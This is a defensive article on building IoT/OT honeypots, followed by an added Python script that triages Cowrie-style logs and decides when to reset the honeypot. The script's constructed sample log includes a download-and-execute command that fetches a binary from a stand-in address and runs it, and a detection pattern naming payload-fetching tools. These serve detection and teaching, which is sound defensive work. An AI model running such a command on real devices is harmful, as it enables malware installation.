Why Honeypots Matter in IoT/OT Security 

Honeypots are a valuable component of the modern threat intelligence toolkit. Because they let defenders observe malicious traffic without exposing critical company assets, they show how attackers actually try to compromise systems and yield intelligence on threat actor tactics, techniques and procedures that can be fed straight back into defenses. 

More than that, honeypots are an efficient and cheap way to test security practices. A honeypot can be deployed on the network with minimal effort, often on decommissioned equipment that has been repurposed for the job. And that is only for traditional IT assets like workstations and network gateways. 

With Internet of Things (IoT) devices and operational technology (OT), honeypots become even more vital to a strong cyber defense strategy. The number of cyberattacks is increasing across the board, and as more IoT devices are deployed in more settings, threat actors target them more frequently. 

This makes repurposing decommissioned IoT devices as honeypots an even more attractive facet of a defensive strategy. Before deploying one within an IoT architecture, it’s important to understand how they function. 

What is a Honeypot? 

In the simplest terms, a honeypot is a trap baited for attackers. The technology is structured in such a way as to make it attractive for threat actors scanning a network for targets. Within the context of traditional IT, this could be a workstation with limited software or a cloud asset within a virtual private cloud. 

The important part is that the honeypot is not connected to any production environment. It is an orphan asset designed to act only as a lure for malicious activity. Because no legitimate user or system has any reason to talk to it, every connection it receives is unsolicited: at best an internet-wide scanner, at worst an attacker, and in either case worth recording. 

This makes the honeypot an invaluable asset for cyber defense. Ideally, threat actors are contained and can’t move laterally to cause further damage once they take the bait, while defenders gather data about the attack chain and use that insight to improve their defenses. 

Honeypots become even more important with IoT devices, especially as more connected devices are deployed within different companies. Threat actors will continue to attack these systems, and defending them requires more tools like honeypots. 

The Benefits and Drawbacks of Honeypots

Honeypots are extremely beneficial as part of a strategy to improve IoT/OT security. Part of the issue with defending connected equipment is understanding how attackers target these systems and what they intend to do once they gain a foothold. An IoT/OT honeypot that traps attackers can gather that information and give you intelligence into: 

  • Where cybercriminals are coming from
  • Threat level
  • What methods they’re using
  • The data or applications they are interested in
  • How well your security measures work to stop cyberattacks

These are incredibly valuable details that security teams can use internally and share with the community as part of improving everyone else’s defenses too. For IoT/OT security, honeypots can be used to track patterns in IP addresses, geographic sources of traffic, or any other patterns that might signify an attack. 

How to Set up an IoT/OT Honeypot

IoT/OT honeypots are typically set up to mimic specific devices or protocols on the network. Ideally, this is a device that has previously been exploited or is of some interest overall. This could be something like a connected security camera or an internet-enabled HVAC system. Once you’ve chosen the device or protocol to mimic, you need to understand any publicly identified vulnerabilities. 

Knowing about identified vulnerabilities will give you an idea about what to emulate in the honeypot. Remember that honeypots are designed to be attractive to threat actors, so you’re going to build intentional weaknesses into the system. Threat actors will notice the weakness and attack the trap instead of your real systems. 

Setting up a test environment is the next step, and it can be complex. Ideally, you verify the honeypot’s configuration by running a public exploit for the vulnerability it emulates and confirming that the honeypot responds the way a real device would. That means you then have to reset the device to a clean state, which can be difficult on physical IoT/OT hardware. Virtual machines make resetting easier, but they also make it simpler for threat actors to recognize a virtualized environment and disengage. 

For the test environment itself, purpose-built honeypot software is usually the best option. Cowrie, for example, emulates an SSH and Telnet server with a fake Linux file system and canned command output designed to look like a real host, and it logs every login attempt, command and file download; Conpot plays the same role for OT by emulating industrial protocols. This is also the option that takes the most time to deploy well, because the emulated responses have to be tuned to the device you are imitating. 

Next, set up detection rules for when the system is misused or exploitation occurs. Some honeypot platforms limit what they log, so make certain you get as much visibility as possible into activity within the honeypot: every login attempt and the credentials used, every command entered, every file fetched, and every attempted outbound connection. More visibility means you can more readily determine what the threat actor is trying to do and how they operate. That can lead to improved defenses for the rest of your network, and even provide value to your peers. 

Hardening the honeypot is the next, and arguably most vital, step of deploying one of these systems. Traps are only effective if the thing being trapped can’t break out. Creating and deploying a honeypot on your network has to be done in such a way that the threat actor is pulled in and can’t use the system to move laterally. Further, configure the IoT/OT honeypot so that it cannot initiate communication with anything except your log collector, and so that nothing an attacker does on the device can change that: enforce the restriction with egress filtering on the network segment or a firewall outside the attacker’s reach, not with a setting inside the honeypot that a shell session could flip. A honeypot that can reach the internet becomes a malware-staging or DDoS node; one that can reach your LAN becomes a pivot. 

Lastly, automate data gathering and resetting of the honeypot device. You want to pull intelligence off the system quickly and efficiently, since there may be several honeypots running on the same network, and you want the device back to a clean state before the next threat actor arrives so they don’t find a previous attacker’s payloads already installed. Automation is key here and needs to be implemented as part of creating the trap. Without it, you risk not being able to reset all the honeypots to a clean state at the necessary speed. 
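As an added example that is not part of the original article, the script below ties together the detection-rules step and the automated collection and reset step. It reads Cowrie-style JSON event lines (the field names follow the format Cowrie writes to its JSON log: eventid, src_ip, session, username, password, input, url), flags accepted credentials, payload-staging commands and file downloads, summarises activity per source IP, and decides whether the honeypot has been touched and must be reset. The log lines are constructed for illustration rather than captured traffic, and the reset policy and the list of staging commands are assumptions to adapt to your own deployment.

```python
"""Triage Cowrie-style JSON honeypot logs: apply detection rules, summarise
activity per source, and decide whether the honeypot needs a reset.

Added example, not Cowrie's own code. The sample log lines below are
constructed for illustration and only mimic Cowrie's JSON field names."""
import json
import re
from collections import defaultdict

# Constructed sample: two sources, one of which logs in and stages a payload.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","session":"a1","dst_port":2323,"protocol":"telnet","timestamp":"2024-05-01T10:00:00Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","session":"a1","username":"root","password":"admin","timestamp":"2024-05-01T10:00:01Z"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.7","session":"a1","username":"root","password":"12345","timestamp":"2024-05-01T10:00:02Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1","input":"cat /proc/cpuinfo","timestamp":"2024-05-01T10:00:03Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1","input":"cd /tmp; wget http://198.51.100.9/bins/arm7; chmod +x arm7; ./arm7","timestamp":"2024-05-01T10:00:04Z"}
{"eventid":"cowrie.session.file_download","src_ip":"203.0.113.7","session":"a1","url":"http://198.51.100.9/bins/arm7","outfile":"dl/sample","shasum":"0000","timestamp":"2024-05-01T10:00:05Z"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.7","session":"a1","timestamp":"2024-05-01T10:00:06Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.42","session":"b2","dst_port":22,"protocol":"ssh","timestamp":"2024-05-01T10:05:00Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.42","session":"b2","username":"admin","password":"1234","timestamp":"2024-05-01T10:05:01Z"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.42","session":"b2","timestamp":"2024-05-01T10:05:02Z"}
"""

# Commands that fetch or stage a payload (assumed list). Seeing one means the
# attacker is past reconnaissance and your egress filtering is about to be tested.
STAGING_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")


def parse_events(text):
    """Yield parsed events, skipping blank or non-JSON lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict) and "eventid" in event:
            yield event


def detect(event):
    """Return the (rule, detail) pairs that fire for a single event."""
    hits = []
    eid = event["eventid"]
    if eid == "cowrie.login.success":
        hits.append(("credential_accepted",
                     f"{event.get('username')}:{event.get('password')}"))
    elif eid == "cowrie.command.input":
        cmd = event.get("input", "")
        if STAGING_RE.search(cmd):
            hits.append(("payload_staging", cmd))
    elif eid == "cowrie.session.file_download":
        hits.append(("file_download", event.get("url", "")))
    return hits


def triage(text):
    """Summarise activity per source IP and decide whether a reset is needed."""
    sources = defaultdict(lambda: {"sessions": set(), "credentials": set(),
                                   "commands": [], "downloads": [], "alerts": []})
    for event in parse_events(text):
        src = sources[event.get("src_ip", "unknown")]
        src["sessions"].add(event.get("session"))
        if event["eventid"] in ("cowrie.login.failed", "cowrie.login.success"):
            src["credentials"].add((event.get("username"), event.get("password")))
        if event["eventid"] == "cowrie.command.input":
            src["commands"].append(event.get("input", ""))
        if event["eventid"] == "cowrie.session.file_download":
            src["downloads"].append(event.get("url", ""))
        src["alerts"].extend(detect(event))
    # Reset policy (assumed): once anyone has run commands or pulled a file, the
    # emulated host is dirty and must be reset before the next visitor can see
    # evidence of an earlier compromise. Failed logins alone leave it clean.
    needs_reset = any(s["commands"] or s["downloads"] for s in sources.values())
    return {"sources": dict(sources), "needs_reset": needs_reset}


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for ip, info in report["sources"].items():
        print(f"{ip}: {len(info['sessions'])} session(s), "
              f"{len(info['credentials'])} credential(s) tried, "
              f"{len(info['alerts'])} alert(s)")
        for rule, detail in info["alerts"]:
            print(f"  [{rule}] {detail}")
    print("reset required:", report["needs_reset"])
```

In a real deployment the reset decision would trigger whatever restores your honeypot to its clean image (a VM snapshot revert, a container recreate, or a reflash of the repurposed device), and the per-source summary is what you would forward to your SIEM or share with peers.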

Honeypots as a Strategic Linchpin for Threat Intelligence

Honeypots are a vital component of a threat intelligence strategy. Setting them up lets you track how attackers aim to compromise your network, and gives you the telemetry needed to record that activity accurately. Understanding how attackers seek to compromise your IoT/OT devices can improve your defenses and support a long-term security strategy for connected equipment.
